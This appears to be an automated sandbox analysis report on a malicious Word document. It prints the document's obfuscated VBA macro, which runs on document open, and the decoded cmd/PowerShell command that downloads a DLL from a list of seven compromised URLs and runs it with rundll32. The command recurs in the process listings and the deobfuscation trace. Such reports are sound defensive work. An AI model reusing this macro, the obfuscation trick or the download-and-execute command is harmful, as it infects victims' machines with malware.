    s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
    Dim fs As Integer
    Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll")
    s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj"
    If d <> 0.123456 Then
    ra = Replace(s2, "DaI", "")
    End If
    service.Run ra, 0
End Sub
Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()
    folder$ = GetFolder()
    If folder$ = "" Then Exit Sub
    MsgBox ":" & folder$, vbInformation
End Sub
Private Sub Document_Open()
    Dim dfjrqlwihjpqwof As String
    dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0
    If fojn = "afqowihro3ihoqew df" Then
        fjl = "gks; kr4;"
        MsgBox fjl
    End If
End Sub
Sub dgfhoswihetaoihegaosoaihcbi()
    On Error Resume Next: GetFolder , True
End Sub
Function bcbcmbvbvch3h2yg3u5i4tyirugiu(Optional ByVal FolderIndex& = 0, Optional ByVal ShowDialog As Boolean = False, Optional ByVal Title$ = "", Optional ByVal InitialFolder$) As String
    On Error Resume Next: Err.Clear
    ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",")
    PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "")
    If Len(PreviousFolder$) > 0 And Not ShowDialog Then
        If Dir(PreviousFolder$, vbDirectory) <> "" Then GetFolder = PreviousFolder$: Exit Function
    End If
    If InitialFolder$ = "" Then
        If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then
            InitialFolder$ = PreviousFolder$
        Else
            InitialFolder$ = ThisWorkbook.Path & "\"
        End If
    End If
    With Application.FileDialog(msoFileDialogFolderPicker)
        .ButtonName = "": .Title = Title: .InitialFileName = InitialFolder$
        If .Show <> -1 Then Exit Function
        GetFolder = .SelectedItems(1)
        If Not Right$(GetFolder, 1) = "\" Then GetFolder = GetFolder & "\"
        SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder
    End With
End Function

    Streams

    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521
    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:521
    Entropy:5.22231541281
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = b v k a e i k u 2 n c o i 2 u h o 3 i h d e s / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 F 5 D F 3 5 6 0 D E A 6 8 E E 6 8 E E 6 C F 2 6 C F 2 " . . D
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30
    Stream Path: PROJECTwm, File Type: data, Stream Size: 74
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:74
    Entropy:3.31599778695
    Base64 Encoded:False
    Data ASCII:b v k a e i k u 2 n c o i 2 u h o 3 i h d e s . b . v . k . a . e . i . k . u . 2 . n . c . o . i . 2 . u . h . o . 3 . i . h . d . e . s . . . . .
    Data Raw:62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 00 62 00 76 00 6b 00 61 00 65 00 69 00 6b 00 75 00 32 00 6e 00 63 00 6f 00 69 00 32 00 75 00 68 00 6f 00 33 00 69 00 68 00 64 00 65 00 73 00 00 00 00 00
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4778
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4778
    Entropy:4.85191198027
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
    Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
    Stream Path: VBA/dir, File Type: data, Stream Size: 841
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:841
    Entropy:6.48895457492
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . o . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
    Data Raw:01 45 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6f c3 8b 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    Analysis Process: WINWORD.EXE PID: 2640 Parent PID: 596

    General

    Start time:10:54:15
    Start date:22/11/2021
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13fad0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Chronological Activities

    Analysis Process: cmd.exe PID: 2632 Parent PID: 2640

    General

    Start time:10:54:20
    Start date:22/11/2021
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x4ab10000
    File size:345088 bytes
    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Chronological Activities

    Analysis Process: powershell.exe PID: 2840 Parent PID: 2632

    General

    Start time:10:54:21
    Start date:22/11/2021
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x13f580000
    File size:473600 bytes
    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    Chronological Activities

    Disassembly

    Code Analysis

    VBA Code

    Call Graph

    Graph

    Module: bvkaeiku2ncoi2uho3ihdes

    Declaration
    LineContent
    1

    Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"

    2

    Attribute VB_Base = "1Normal.ThisDocument"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = True

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = True

    8

    Attribute VB_Customizable = True

    Executed Functions
    Subroutine dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, APIs: 3, Strings: 6, Number of lines: 12, Relevance: 34.012
    APIsMeta Information

    CreateObject

    		CreateObject("Wscript.Shell")

    Replace

    		Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj

    Run

    		IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0
    StringsDecrypted Strings
    "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
    "Wsc"
    """"
    "DaI"
    """"
    "DaI"
    LineInstructionMeta Information
    53

    Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 as String, ndr54 as Long, bvret as Long)

    54

    Dim s1, s2, ra, glew, hkqwfsadesf, st as String

    executed
    55

    Dim d, R as Double

    56

    s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "

    57

    Dim fs as Integer

    58

    Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll")

    CreateObject("Wscript.Shell")

    executed
    59

    s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj"

    60

    If d <> 0.123456 Then

    61

    ra = Replace(s2, "DaI", "")

    Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj

    executed
    62

    Endif

    63

    service.Run ra, 0

    IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

    executed
    64

    End Sub

    Subroutine Document_Open, APIs: 5, Strings: 4, Number of lines: 8, Relevance: 17.508
    APIsMeta Information

    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: CreateObject

    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Replace

    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Run

    fojn

    MsgBox

    StringsDecrypted Strings
    "sd"
    "afqowihro3ihoqew df"
    "gks; kr4;"
    "gks; kr4;"
    LineInstructionMeta Information
    70

    Private Sub Document_Open()

    71

    Dim dfjrqlwihjpqwof as String

    executed
    72

    dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0

    73

    If fojn = "afqowihro3ihoqew df" Then

    fojn

    74

    fjl = "gks; kr4;"

    75

    MsgBox fjl

    MsgBox

    76

    Endif

    77

    End Sub

    Non-Executed Functions
    Subroutine tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig, APIs: 43, Strings: 25, Number of lines: 46, Relevance: 102.046
    APIsMeta Information

    Clear

    GetFolder

    MsgBox

    vbCritical

    GetFolder

    MsgBox

    vbCritical

    FilenamesCollection

    Count

    MsgBox

    vbNewLine

    vbExclamation

    ProgressIndicator

    Show

    StartNewAction

    Count

    ScreenUpdating

    SubAction

    Dir

    Log

    Dir

    Open

    Log

    vbTab

    Worksheets

    Range

    End

    xlUp

    Resize

    Rows

    Transpose

    Value

    Close

    DoEvents

    Log

    vbTab

    Dir

    vbNormal

    Hide

    DoEvents

    ScreenUpdating

    MsgBox

    vbInformation

    StringsDecrypted Strings
    "(look)"
    """"
    """"
    ","
    """"
    ","
    ","
    "?????? ?*??*.xls*"
    """"
    """"
    """"
    "$index $count"
    "$time"
    ":"
    "a"
    "b"
    "b1"
    "$index $count"
    "$time"
    ":"
    ":"
    "b"
    "b1"
    "a"
    """"
    LineInstructionMeta Information
    9

    Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig()

    10

    On Error Resume Next

    10

    Err.Clear

    Clear

    11

    InvoiceFolder$ = GetFolder(1, , "(look)")

    GetFolder

    12

    If InvoiceFolder$ = "" Then

    12

    MsgBox "", vbCritical, ""

    MsgBox

    vbCritical

    12

    Exit Sub

    12

    Endif

    13

    ArchieveFolder$ = GetFolder(2, , ",")

    GetFolder

    14

    If ArchieveFolder$ = "" Then

    14

    MsgBox ",", vbCritical, ","

    MsgBox

    vbCritical

    14

    Exit Sub

    14

    Endif

    15

    Dim coll as Collection

    16

    Set coll = FilenamesCollection(InvoiceFolder$, "?????? ?*??*.xls*", 1)

    FilenamesCollection

    17

    If coll.Count = 0 Then

    Count

    18

    MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, ""

    MsgBox

    vbNewLine

    vbExclamation

    19

    Exit Sub

    20

    Endif

    21

    Dim pi as New ProgressIndicator

    ProgressIndicator

    21

    pi.Show "", , 2

    Show

    22

    pi.StartNewAction , , , , , coll.Count

    StartNewAction

    Count

    23

    Dim WB as Workbook, sh as Worksheet, ra as Range

    24

    Application.ScreenUpdating = False

    ScreenUpdating

    25

    For Each FileName in coll

    26

    pi.SubAction "$index $count", ":" & Dir(FileName), "$time"

    SubAction

    Dir

    27

    pi.Log ":" & Dir(FileName)

    Log

    Dir

    28

    Set WB = Nothing

    28

    Set WB = Workbooks.Open(FileName, False, True)

    Open

    29

    If WB Is Nothing Then

    30

    pi.Log vbTab & "."

    Log

    vbTab

    31

    Else

    32

    Set sh = WB.Worksheets(1)

    Worksheets

    33

    Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp))

    Range

    End

    xlUp

    34

